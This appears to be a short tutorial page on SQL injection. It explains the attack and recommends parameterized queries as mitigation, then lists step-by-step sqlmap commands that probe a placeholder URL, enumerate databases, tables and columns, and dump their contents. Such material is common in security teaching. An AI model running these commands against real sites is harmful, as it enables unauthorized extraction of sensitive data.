Simple SQL Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

There are two complementary and successful methods of mitigating SQL Injection attacks:
Parameterized queries using bound, typed parameters
Careful use of parameterized stored procedures.
Parameterized queries are the easiest to adopt, and work in fairly similar ways among most web technologies in use today, including:
Java
.NET
Perl
PHP
Coldfuion

The above video demonstrates a sucsessful sql injection attack using sqlMap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It can be found at http://sqlmap.sourceforge.net

Simple steps used in video example:
### see if the page is injectiable

1. './sqlmap.py -u http://yoursitehere.com/vulnerablefile'

### get database names

2. './sqlmap.py -u http://yoursitehere.com/vulnerablefile --dbs'

### get table names
3. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename --tables'

### get column names
4. './sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename --columns'

### get the data
'./sqlmap.py -u http://yoursitehere.com/vulnerablefile -D databasename -T tablename -C colum1, column2 --dump'